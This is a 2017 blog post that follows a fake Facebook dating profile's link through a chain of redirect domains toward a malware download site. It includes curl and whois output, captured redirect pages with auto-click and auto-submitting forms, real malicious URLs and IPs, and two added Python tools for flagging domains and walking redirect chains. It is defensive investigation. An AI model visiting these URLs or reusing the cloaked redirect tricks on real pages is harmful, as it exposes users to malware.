Anatomy of a Malware Injection

Written by dweekly | Published 2017/08/10
Tech Story Tags: spam


Today I got a number of pretty questionable “friend requests” from young females on Facebook with zero mutual friends and with very racy profile pics. Of course they were fake, but I was curious to (safely) explore what was at the bottom of the rabbit hole. It was an exciting trip.

The journey touches Facebook, Google, and Amazon along with dozens of other web hosts and registrars, and spans the globe from the US to Indonesia to Germany and elsewhere. It’s a bizarrely elegant integration of touchpoints from a range of technology stacks and services, all conspiring to get a lonely guy eager for a sex massage to accidentally install some software in his browser.

Here’s “Blanca Aline Laine” (made up name)

Above we see the fake profile, since taken down by Facebook. I’m still friends with the fraud team there, which is helpful. Racy images (but not NSFW, like some of the other ones) with profile text indicating she A) lives in my city (Redwood City) and B) can drive to a client’s house and give a “sex massage package for $5.00”. What a good deal, eh?

Most of these fake profiles I saw today have included goo.gl URL shortened links to try and mask the destination, and include this as part of their profile picture caption. I wondered if Facebook automatically alerts Google when it finds goo.gl shortlinks it needs to blackhole.

I dove in on the command line to try and index where this went.

Caution: please do not follow any of these links below in your browser. They are operated by malware vendors and may harm your computer.

First stop was Google (yay!)

$ curl -v -v https://goo.gl/7uvoPS
*   Trying 172.217.6.78...
* TCP_NODELAY set
* Connected to goo.gl (172.217.6.78) port 443 (#0)
* TLS 1.2 connection using TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
* Server certificate: *.google.com
* Server certificate: Google Internet Authority G2
* Server certificate: GeoTrust Global CA
> GET /7uvoPS HTTP/1.1
> Host: goo.gl
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
< Content-Type: text/html; charset=UTF-8
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: Mon, 01 Jan 1990 00:00:00 GMT
< Date: Thu, 10 Aug 2017 03:47:16 GMT
< Location: http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
< Server: GSE
< Alt-Svc: quic=":443"; ma=2592000; v="39,38,37,35"
< Accept-Ranges: none
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
<
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do">here</A>.</BODY></HTML>

Simple 301 permanent redirect (note the QUIC advertisement!). Redirect is to a .top TLD — wait, what? I don’t think I’ve ever seen a legit .top website. Yep, check Spamhaus — .top is a “top 10” spam TLD. .top indeed! The TLD is operated by the prestigious “jiangsu bangning science and technology company”. [sigh] Okay, I wonder who owns the domain.

$ whois pucukharum.top
Domain Name: pucukharum.top
Registry Domain ID: D20170405G10001G_05028476-TOP
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2017-04-05T05:36:50Z
Creation Date: 2017-04-05T05:36:23Z
Registry Expiry Date: 2018-04-05T05:36:23Z
Registrar: Namecheap Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: bd76px9aqmn8dhij
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code: 0
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.com
Registry Admin ID: 47ukg1inpzur0syp
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code: 0
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.com
Registry Tech ID: 6wpuqoght8t1dv3p
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code: 0
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: fbf6f8770e9f42d3bac4e0f0740d12f2.protect@whoisguard.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2017-08-10T04:13:29Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.

TERMS OF USE: The information in the Whois database is collected through ICANN-accredited registrars. Jiangsu bangning science & technology Co., Ltd(“BANGNING”) make this information available to you and do not guarantee its accuracy or completeness. By submitting a whois query, you agree to abide by the following terms of use: you agree that you may use this data only for lawful purposes and that under no circumstances will you use this data to: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection acts; or (3) to enable high volume, automated, electronic processes that apply to BANGNING (or its computer systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without BANGNING prior written permission. You agree not to use electronic processes that are automated and high-volume to access or query the whois database except as reasonably necessary to register domain names or modify existing registrations. BANGNING reserves the right to restrict your access to the whois database in its sole discretion to ensure operational stability. BANGNING may restrict or terminate your access to the whois database for failure to abide by these terms of use. BANGNING reserves the right to modify these terms at any time without prior or subsequent notification of any kind.

Ah, it’s a NameCheap registered domain and protected by WhoisGuard. And the site main page insists it’s “down for maintenance”. Mmhmm…
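The signals this whois record gives away (a domain a few months old, a privacy-shielded registrant, a one-year registration on a TLD with a poor reputation) are the kind of thing worth scripting rather than eyeballing. The Python below is an added example written for this article, not the author's tooling: it parses a cut-down copy of the record above (constructed from the output quoted on this page), computes the domain's age at the time of the query, and raises the same flags the text raises. The TLD watch-list holds only the two TLDs this post attributes to Spamhaus's top-10 list, and the 180-day "new domain" threshold is an arbitrary analyst choice, not a standard.

```python
import re
from datetime import datetime, timezone

# Constructed sample: the registry WHOIS record quoted in the post for pucukharum.top,
# cut down to the fields this triage reads (the real record has many more lines).
SAMPLE_WHOIS = """\
Domain Name: pucukharum.top
Registrar WHOIS Server: whois.namecheap.com
Updated Date: 2017-04-05T05:36:50Z
Creation Date: 2017-04-05T05:36:23Z
Registry Expiry Date: 2018-04-05T05:36:23Z
Registrar: Namecheap Inc.
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Country: PA
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
>>> Last update of WHOIS database: 2017-08-10T04:13:29Z <<<
"""

# Analyst watch-list: only the two TLDs the post cites from Spamhaus's "top 10".
# In real use, feed this from a current reputation source instead.
WATCHED_TLDS = {"top", "gdn"}
PRIVACY_MARKERS = ("whoisguard", "privacy", "proxy", "redacted")
NEW_DOMAIN_DAYS = 180  # arbitrary threshold chosen for this example

FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z /]*?):\s*(.*?)\s*$")
LAST_UPDATE_RE = re.compile(r"last update of whois database:\s*(\S+)", re.I)


def parse_whois(text):
    """Collect 'Key: value' lines into {key: [values]}; keys like Name Server repeat."""
    record = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            record.setdefault(m.group(1).strip(), []).append(m.group(2))
    return record


def parse_ts(value):
    """Registry timestamps are ISO-8601 UTC, e.g. 2017-04-05T05:36:23Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def triage_domain(whois_text, observed_at=None, watched_tlds=WATCHED_TLDS):
    """Summarise a registry WHOIS record and flag the signals an analyst cares about."""
    rec = parse_whois(whois_text)
    first = lambda key: rec.get(key, [""])[0]
    if observed_at is None:  # default to the registry's own "last update" stamp
        observed_at = parse_ts(LAST_UPDATE_RE.search(whois_text).group(1))
    domain = first("Domain Name").lower()
    created = parse_ts(first("Creation Date"))
    expires = parse_ts(first("Registry Expiry Date"))
    # Only contact fields decide whether the registrant is hidden behind a proxy.
    contacts = " ".join(v for k, vs in rec.items()
                        if k.startswith(("Registrant", "Admin", "Tech")) for v in vs).lower()
    result = {
        "domain": domain,
        "tld": domain.rsplit(".", 1)[-1],
        "registrar": first("Registrar"),
        "age_days": (observed_at - created).days,
        "term_days": (expires - created).days,
        "privacy_protected": any(marker in contacts for marker in PRIVACY_MARKERS),
        "dnssec": first("DNSSEC").lower() or "unknown",
        "flags": [],
    }
    if result["tld"] in watched_tlds:
        result["flags"].append(f".{result['tld']} is on the TLD watch-list")
    if result["age_days"] < NEW_DOMAIN_DAYS:
        result["flags"].append(f"registered only {result['age_days']} days before observation")
    if result["privacy_protected"]:
        result["flags"].append("registrant hidden behind a privacy/proxy service")
    if result["term_days"] <= 366:
        result["flags"].append("minimum-term (one-year) registration")
    return result


if __name__ == "__main__":
    for key, value in triage_domain(SAMPLE_WHOIS).items():
        print(f"{key}: {value}")
```

None of the flags is damning on its own (plenty of legitimate hobby domains are young, cheap and privacy-protected), which is why the function returns all of them together rather than a verdict; the post's own reasoning is the combination, not any one signal.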

$ host gillian.pucukharum.top
gillian.pucukharum.top has address 138.197.209.244
$ whois 138.197.209.244
...
NetRange: 138.197.0.0 - 138.197.255.255
CIDR: 138.197.0.0/16
NetName: DIGITALOCEAN-16

Here’s the holding page:

$ curl -v -v http://gillian.pucukharum.top/SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do
*   Trying 138.197.209.244...
* TCP_NODELAY set
* Connected to gillian.pucukharum.top (138.197.209.244) port 80 (#0)
> GET /SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09_95816436.do HTTP/1.1
> Host: gillian.pucukharum.top
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.10.1 (Ubuntu)
< Date: Thu, 10 Aug 2017 03:47:54 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
<

<head><meta name="referrer" content="never"><noscript><META http-equiv="refresh" content="0;URL=ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"></noscript></head><script>window.opener = null; location.replace("ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09")</script>

Here’s a 200 page returned from a .do file (usually a Java Struts action)…but only with a meta refresh to a PHP script on the same domain, on a machine hosted by DigitalOcean. Odd. Okayyyy…

$ curl -v -v "http://gillian.pucukharum.top/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"
*   Trying 138.197.209.244...
* TCP_NODELAY set
* Connected to gillian.pucukharum.top (138.197.209.244) port 80 (#0)
> GET /ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09 HTTP/1.1
> Host: gillian.pucukharum.top
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Found
< Server: nginx/1.10.1 (Ubuntu)
< Date: Thu, 10 Aug 2017 03:49:16 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Location: http://digitalz.review/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09

Okay…another weird TLD here. With another NameCheap WhoisGuard domain. Hosted by DigitalOcean. With the same “Down for Maintenance” page on both the domain and IP. Oddly familiar...

$ curl -v -v "http://digitalz.review/ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09"
*   Trying 138.197.207.100...
* TCP_NODELAY set
* Connected to digitalz.review (138.197.207.100) port 80 (#0)
> GET /ngapax.php?user=SHM2bkh2N3lZSFRHOEZtVDRoN0VUUT09&grup=UkwwRktNQ2IzK2Y5Tk5rRko2VDI5UT09 HTTP/1.1
> Host: digitalz.review
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Thu, 10 Aug 2017 03:49:29 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
<

<!DOCTYPE html><html lang="en"><head><title> Please Wait...</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="robots" content="noindex, nofollow">

<noscript> <style>html{display:none;}</style><meta http-equiv="refresh" content="0;http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969"></noscript>

<script type = "text/javascript">window.setTimeout("autoClick()", 500); // 10 seconds delay
function autoClick() {var linkPage = document.getElementById("dynLink").href;window.location.href = linkPage;}</script></head><Body>

<img src="http://169.55.150.194/track.php?a=NGAPAX&b=MASTERMIND&c=&d=24.5.178.157&e=desktop&f=&g=unknown&h=mastermind1502336969"><a href="http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969 " id="dynLink"></a>

</Body>
</html>

Here we’ve got a meta-refresh to yet another domain, with a charming tracker script & image (“CLick Factory@The Genz”) hosted by SoftLayer and operated by Indonesians (?!), returning a 1x1 JPG (why not .GIF?) created by gd-jpeg.

Looks like this domain is registered by key-systems.net (German) and has DNS service provided by AWS.

$ whois ssl-cd.com
Domain Name: SSL-CD.COM
Registry Domain ID: 2068776467_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.rrpproxy.net
Registrar URL: http://www.key-systems.net
Updated Date: 2016-12-13T09:18:01Z
Creation Date: 2016-10-25T10:04:13Z
Registry Expiry Date: 2017-10-25T10:04:13Z
Registrar: Key-Systems GmbH
Registrar IANA ID: 269
Registrar Abuse Contact Email: abuse@key-systems.net
Registrar Abuse Contact Phone: +49.68949396850
Domain Status: ok https://icann.org/epp#ok
Name Server: NS-1151.AWSDNS-15.ORG
Name Server: NS-1875.AWSDNS-42.CO.UK
Name Server: NS-24.AWSDNS-03.COM
Name Server: NS-777.AWSDNS-33.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-08-10T04:55:21Z <<<

And sure enough, the site itself is hosted on AWS as well.

$ host ssl-cd.com
ssl-cd.com has address 52.202.232.0
ssl-cd.com has address 54.174.134.18
$ whois 52.202.232.0
...
NetRange: 52.192.0.0 - 52.223.255.255
CIDR: 52.192.0.0/11
NetName: AT-88-Z
NetHandle: NET-52-192-0-0-1
Parent: NET52 (NET-52-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Amazon Technologies Inc. (AT-88-Z)
RegDate: 2015-09-02
Updated: 2015-09-02
Ref: https://whois.arin.net/rest/net/NET-52-192-0-0-1

And here’s a 302 to cdprivate.com…

$ curl -v -v "http://ssl-cd.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969"
*   Trying 52.202.232.0...
* TCP_NODELAY set
* Connected to ssl-cd.com (52.202.232.0) port 80 (#0)
> GET /?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969 HTTP/1.1
> Host: ssl-cd.com
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Found
< Cache-Control: private
< Content-Type: text/html; charset=utf-8
< Location: http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb
< Date: Thu, 10 Aug 2017 03:50:48 GMT
< Content-Length: 283
<
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb">here</a>.</h2></body></html>

Also registered by key-systems.net and hosted on AWS with Route53 DNS.

$ host cdprivate.com
cdprivate.com has address 52.202.232.0
cdprivate.com has address 54.174.134.18

And the same set of IPs. Odd. Wonder why they need the extra redirect and domain…?

$ curl -v -v "http://cdprivate.com/?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb"
*   Trying 52.202.232.0...
* TCP_NODELAY set
* Connected to cdprivate.com (52.202.232.0) port 80 (#0)
> GET /?a=47752&c=90645&s1=&s2=NGAPAX&s3=MASTERMIND&s4=&s5=mastermind1502336969&ckmguid=99274524-c7b2-409c-bdae-227123f22acb HTTP/1.1
> Host: cdprivate.com
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Found
< Cache-Control: private
< Content-Type: text/html; charset=utf-8
< Location: http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249
< p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
< Set-Cookie: sfd=gYcMLbT3p2Qq4qjzNWkj3GBapgYL+C9YYKjchnfxHwPf4An8Fwbg3Q==; domain=.cdprivate.com; path=/; HttpOnly
< Set-Cookie: tib=Sq1clb2N/nFPTQFRAWNbtWBapgYL+C9YYKjchnfxHwPf4An8Fwbg3Q==; domain=.cdprivate.com; expires=Wed, 10-Aug-2022 03:51:44 GMT; path=/; HttpOnly
< Date: Thu, 10 Aug 2017 03:51:43 GMT
< Content-Length: 177
<
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249">here</a>.</h2></body></html>

Here’s another 302, this time to a UniRegistrar-registered throwaway domain (2587812.com), hosted at Linode (a VPS provider).

$ host varm.2587812.com
varm.2587812.com has address 45.79.165.120
$ whois 45.79.165.120
...
NetRange: 45.79.0.0 - 45.79.255.255
CIDR: 45.79.0.0/16
NetName: LINODE-US
NetHandle: NET-45-79-0-0-1
Parent: NET45 (NET-45-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS3595, AS21844, AS8001, AS6939
Organization: Linode (LINOD)
RegDate: 2015-04-29
Updated: 2015-04-29
Comment: Linode, LLC
Comment: http://www.linode.com
Ref: https://whois.arin.net/rest/net/NET-45-79-0-0-1

And now…

$ curl -v -v "http://varm.2587812.com/?kw={kw}&s1=-1&s2=6342103249"
*   Trying 45.79.165.120...
* TCP_NODELAY set
* Connected to varm.2587812.com (45.79.165.120) port 80 (#0)
> GET /?kw=kw&s1=-1&s2=6342103249 HTTP/1.1
> Host: varm.2587812.com
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: openresty/1.11.2.2
< Date: Thu, 10 Aug 2017 03:52:22 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< X-Powered-By: PHP/7.0.11
< X-ImpID: 5057a1bc-7d7f-11e7-b7cd-fa245441bcee
<
<!DOCTYPE html><head><noscript><meta http-equiv="refresh" content="0; url=http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1"></noscript></head>
<body><form id="rform" action="http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee" method="POST"><input type="hidden" name="payload" value="…"><input type="hidden" name="js_enabled" value="1"><input type="hidden" name="init_ev" value="1"><input type="hidden" name="iv" value="b25020d0634d8814b3c70f55cd586614"></form>
<script type="text/javascript">document.getElementById('rform').submit();</script></body></html>

And here we get a fascinating auto-POST of a form with a fairly lengthy payload — or a simple meta refresh for folks without JS enabled. To a .GDN TLD, which I had also never heard of. Guess where .GDN ranks in SpamHaus’s “Top 10” spam TLDs? It’s #1. You’ve never heard of a legit .GDN site for a reason, kids. The registry is run by a Dubai-based corp and Epik domains seems to have registered this particular “hapc.gdn” domain.
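Every hop so far has handed the browser along by one of a handful of mechanisms: an HTTP 301/302 Location header, a meta refresh inside noscript, a location.replace() or location = assignment, a timed click on a hidden anchor (the dynLink trick), or a form that submits itself. The Python below is an added example, not the author's code: next_hop() recognises each of those mechanisms in a response and returns the next URL without executing any JavaScript, and walk() follows them against FAKE_NET, an offline stand-in for the network constructed from the hops above with the long query strings shortened. To use it against a live chain you would swap fake_fetch for an HTTP client that does not follow redirects on its own; the regex attribute parsing is deliberately minimal and is an assumption of this example, not a robust HTML parser.

```python
import re
from urllib.parse import urljoin

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
TAG_RE = re.compile(r"<(meta|a|form)\b[^>]*>", re.I)


def _attr(tag, name):
    """Value of one HTML attribute inside a single tag string, or None (regex, not a parser)."""
    m = re.search(r"\b" + name + r"""\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", tag, re.I)
    return next(g for g in m.groups() if g is not None) if m else None


def next_hop(url, status, headers, body):
    """Return (mechanism, absolute_url) for the next hop, or (None, None) if the page is terminal."""
    if status in REDIRECT_STATUSES:                      # 1. HTTP-level redirect
        for name, value in headers:
            if name.lower() == "location":
                return f"http-{status}", urljoin(url, value.strip())
    tags = {"meta": [], "a": [], "form": []}
    for m in TAG_RE.finditer(body):
        tags[m.group(1).lower()].append(m.group(0))
    # 2. location.replace("...") / window.location = "..." / location.href = "..." with a literal
    js = re.search(r"""location(?:\.href)?\s*(?:=|\.replace\()\s*["']([^"']+)["']""", body)
    if js:
        return "js-location", urljoin(url, js.group(1).strip())
    # 3. navigation to document.getElementById("x").href, i.e. a scripted click on a hidden <a>
    click = re.search(r"""getElementById\(["'](\w+)["']\)\.href""", body)
    if click:
        for tag in tags["a"]:
            if _attr(tag, "id") == click.group(1):
                return "js-click", urljoin(url, _attr(tag, "href").strip())
    # 4. document.getElementById('x').submit() on a <form>, usually a POST carrying a payload
    submit = re.search(r"""getElementById\(["'](\w+)["']\)\.submit\(\)""", body)
    if submit:
        for tag in tags["form"]:
            if _attr(tag, "id") == submit.group(1):
                method = (_attr(tag, "method") or "GET").upper()
                return f"form-{method}", urljoin(url, _attr(tag, "action"))
    # 5. <meta http-equiv="refresh" content="0;URL=..."> -- the no-JS fallback; "URL=" is optional
    for tag in tags["meta"]:
        if (_attr(tag, "http-equiv") or "").lower() == "refresh":
            m = re.match(r"\s*\d+\s*;\s*(?:url\s*=\s*)?(.+?)\s*$", _attr(tag, "content") or "", re.I)
            if m:
                return "meta-refresh", urljoin(url, m.group(1))
    return None, None


def walk(fetch, start, max_hops=20):
    """Follow hops via `fetch(url) -> (status, headers, body)`; stops on a loop or a terminal page."""
    chain, url, seen = [], start, set()
    while url and url not in seen and len(chain) < max_hops:
        seen.add(url)
        status, headers, body = fetch(url)
        mechanism, nxt = next_hop(url, status, headers, body)
        chain.append((url, status, mechanism))
        url = nxt
    return chain


# Constructed offline stand-in for the network, modelled on the hops in the post
# (query strings shortened). Values are (status, headers, body).
FAKE_NET = {
    "https://goo.gl/7uvoPS": (301, [("Location", "http://gillian.pucukharum.top/SHM2_95816436.do")], ""),
    "http://gillian.pucukharum.top/SHM2_95816436.do": (200, [],
        '<head><noscript><META http-equiv="refresh" content="0;URL=ngapax.php?user=U1"></noscript></head>'
        '<script>window.opener = null; location.replace("ngapax.php?user=U1")</script>'),
    "http://gillian.pucukharum.top/ngapax.php?user=U1": (302, [("Location", "http://digitalz.review/ngapax.php?user=U1")], ""),
    "http://digitalz.review/ngapax.php?user=U1": (200, [],
        '<noscript><meta http-equiv="refresh" content="0;http://ssl-cd.com/?a=47752"></noscript>'
        '<script>window.setTimeout("autoClick()", 500); function autoClick() {'
        'var linkPage = document.getElementById("dynLink").href; window.location.href = linkPage;}</script>'
        '<a href="http://ssl-cd.com/?a=47752 " id="dynLink"></a>'),
    "http://ssl-cd.com/?a=47752": (302, [("Location", "http://varm.2587812.com/?s2=6342103249")], ""),
    "http://varm.2587812.com/?s2=6342103249": (200, [],
        '<form id="rform" action="http://NrRzz.alldownloads.hapc.gdn/?sov=627219294" method="POST">'
        '<input type="hidden" name="payload" value="..."></form>'
        "<script>document.getElementById('rform').submit();</script>"),
    "http://NrRzz.alldownloads.hapc.gdn/?sov=627219294": (200, [],
        "<noscript><meta http-equiv='refresh' content='0;url=NEX981privacyassistffUS.html'></noscript>"
        '<script>"NEX981privacyassistffUS.html" && (window.location = "NEX981privacyassistffUS.html");</script>'),
    "http://NrRzz.alldownloads.hapc.gdn/NEX981privacyassistffUS.html": (200, [], "<html><body>landing</body></html>"),
}


def fake_fetch(url):
    return FAKE_NET[url]


if __name__ == "__main__":
    for hop_url, status, mechanism in walk(fake_fetch, "https://goo.gl/7uvoPS"):
        print(f"{status} {mechanism or 'terminal':14} {hop_url}")
```

The mechanisms are checked in the order a JavaScript-enabled browser would take them, with the noscript meta refresh last as the fallback; a page that offers both (as the .do page and the NrRzz page do) is reported by its JavaScript path. Note that none of this evaluates script, so a hop that computes its target at runtime is reported as terminal and needs manual follow-up.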

This fine, upstanding website is hosted by VULTR, a VPS host. VULTR is in a subset of IPs owned by Choopa in New Jersey.

$ host NrRzz.alldownloads.hapc.gdn
NrRzz.alldownloads.hapc.gdn has address 45.76.0.183
$ whois 45.76.0.183
...
Vultr Holdings, LLC NET-45-76-0-0-23 (NET-45-76-0-0-2) 45.76.0.0 - 45.76.1.255

Let’s see what’s in store for us!

$ curl -v -v "http://NrRzz.alldownloads.hapc.gdn/?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1"
*   Trying 45.76.0.183...
* TCP_NODELAY set
* Connected to NrRzz.alldownloads.hapc.gdn (45.76.0.183) port 80 (#0)
> GET /?sov=627219294&hid=dtfptlrhfvpd&amp%3Bs1=-1&amp%3Bs2=6342103249&pid=1597&redid=7988&gsid=68&campaign_id=42&p_id=1597&id=XNSX.-r7988-t68&impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee&js_enabled=0&init_ev=1 HTTP/1.1
> Host: NrRzz.alldownloads.hapc.gdn
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 10 Aug 2017 03:52:52 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
< Set-Cookie: ci_session=yYe%2FP9YjrIzn%2Bu0Z3TyhgIpOyB5NWge%2BFzw0PK%2Bd47rXxePI4e5TJhC%2FDyPaopsu06OsNQuC6nPznci4T6Tn8XP%2Bn4L1gtlUHxkwbyrS41bVJzsj2jMQBxyWPbUPfVzl80gh0ROdwIuz8zgrqVeBwX66iQS55mbDbu909K56xYPm2e0L8mS42AI0gwecPjMzCwCHIvS%2BbLbiu%2FNW5CQjhLulGdnSyvv51cDdzuhxqFtOUQjkCnEnaYzG6iTw1yYSIegSaxvJJ0nerom8paEU7qFHig7TRNg%2F%2FZNanyzC5u0bfnw6SkMAE85MmltKAXjKqeP6ysiuqzNERGfIqbiKVQ%3D%3D; expires=Fri, 11-Aug-2017 03:52:52 GMT; Max-Age=86400; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< X-Source: Mini
< Set-Cookie: id=XNSX.-r7988-t68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: SITE_ID=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: sov=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
